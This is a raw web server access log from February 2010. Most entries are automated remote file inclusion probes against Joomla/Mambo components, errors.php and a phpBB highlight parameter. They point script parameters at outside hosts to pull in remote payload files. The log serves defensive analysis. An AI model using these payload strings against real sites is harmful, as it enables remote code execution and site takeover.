208.53.138.137 - - [12/Feb/2010:07:31:27 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:31:38 -0800] "GET /logs/access_100116.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:31:51 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:31:51 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:31:51 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:32:07 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:32:07 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:32:11 -0800] "GET /logs/access_100128.log//components/com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:32:14 -0800] "GET /logs/access_100119.log//components/com_joomlalib/standalone/stubjambo.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:32:14 -0800] "GET /logs/access_100109.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:32:25 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:32:25 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:32:27 -0800] "GET /logs/access_100128.log//components/com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:07:32:31 -0800] "GET /logs/access_100117.log//?_zb_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [12/Feb/2010:07:32:32 -0800] "GET /logs/access_100119.log//components/com_joomlalib/standalone/stubjambo.php=http://www.stjohns4kids.com/siteadmin/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:33:01 -0800] "GET /logs/access_100121.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:33:01 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:33:01 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:33:03 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:33:03 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.250.190 - - [12/Feb/2010:07:33:04 -0800] "GET / HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.pixero.net"
94.124.250.190 - - [12/Feb/2010:07:33:04 -0800] "GET /pnetsite/i/main.png HTTP/1.1" 200 8564 "http://www.pixero.net/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.pixero.net"
94.124.250.190 - - [12/Feb/2010:07:33:04 -0800] "GET /pnetsite/i/background.gif HTTP/1.1" 200 206161 "http://www.pixero.net/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.pixero.net"
58.150.99.131 - - [12/Feb/2010:07:33:06 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.250.190 - - [12/Feb/2010:07:33:06 -0800] "GET /pnetsite/fav.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.pixero.net"
58.150.99.131 - - [12/Feb/2010:07:33:15 -0800] "GET /logs/access_100109.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:07:33:51 -0800] "GET /logs//errors.php?error=http://suspiriaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:07:33:52 -0800] "GET /errors.php?error=http://suspiriaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:07:33:52 -0800] "GET /logs/access_100103.log//errors.php?error=http://suspiriaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:35:10 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:35:34 -0800] "GET /logs/access_100124.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:35:54 -0800] "GET /logs/access_100129.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:35:54 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:35:54 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:07:36:34 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:07:36:35 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:37:44 -0800] "GET /logs/access_100129.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:37:44 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:37:44 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:37:49 -0800] "GET /pictures/p3 HTTP/1.0" 301 80 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:37:51 -0800] "GET /pictures/p3/ HTTP/1.0" 302 12576 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:37:52 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:37:53 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:37:54 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:37:54 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:07:37:55 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:37:58 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:37:58 -0800] "GET /logs/access_100112.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:37:58 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:38:22 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:38:36 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:38:36 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:38:36 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:07:39:01 -0800] "GET /logs/access_100107.log/?path=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:07:39:01 -0800] "GET /logs/?path=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:07:39:01 -0800] "GET /?path=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [12/Feb/2010:07:39:10 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [12/Feb/2010:07:39:11 -0800] "GET /logs/access_100119.log/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [12/Feb/2010:07:39:11 -0800] "GET /logs/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:39:32 -0800] "GET /logs/access_100205.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:39:58 -0800] "GET /logs/access_100129.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:39:58 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:39:58 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:40:11 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:40:21 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:40:28 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:40:30 -0800] "GET /logs/index.php?body=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:40:30 -0800] "GET /index.php?body=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:40:30 -0800] "GET /logs/access_100111.log/index.php?body=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:40:30 -0800] "GET /logs/index.php?body=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:40:31 -0800] "GET /index.php?body=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:40:31 -0800] "GET /logs/access_100111.log/index.php?body=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:40:32 -0800] "GET /logs/access_100115.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:07:40:38 -0800] "GET /logs/access_100123.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:07:40:38 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:07:40:38 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:40:43 -0800] "GET /logs/access_100115.log/index.php?body=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:40:45 -0800] "GET /logs/access_100115.log/index.php?body=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:41:11 -0800] "GET /logs/access_100124.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:42:19 -0800] "GET /logs/access_100115.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:42:22 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:43:05 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:43:05 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:43:05 -0800] "GET /logs/access_100121.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:44:15 -0800] "GET /logs/access_100129.log///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:44:52 -0800] "GET /logs/access_100115.log///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:44:53 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:07:45:12 -0800] "GET /logs/access_100129.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:07:45:13 -0800] "GET /logs/access_100124.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:45:20 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:45:20 -0800] "GET /logs/access_100112.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:45:40 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:45:40 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:45:40 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:45:40 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:45:40 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:45:40 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:45:59 -0800] "GET /logs/access_100129.log///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:07:46:02 -0800] "GET /logs/access_100126.log/errors.php?error=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:07:46:02 -0800] "GET /errors.php?error=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:07:46:02 -0800] "GET /logs/errors.php?error=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:07:46:22 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:46:26 -0800] "GET /logs/access_100115.log///index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:46:49 -0800] "GET /logs/access.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:46:49 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:07:46:49 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:47:11 -0800] "GET /logs/access_100111.log//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:47:11 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:47:11 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:47:12 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:47:12 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:47:12 -0800] "GET /logs/access_100111.log//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:47:14 -0800] "GET /logs/access_100121.log//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:07:47:14 -0800] "GET /logs/access_100121.log//components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
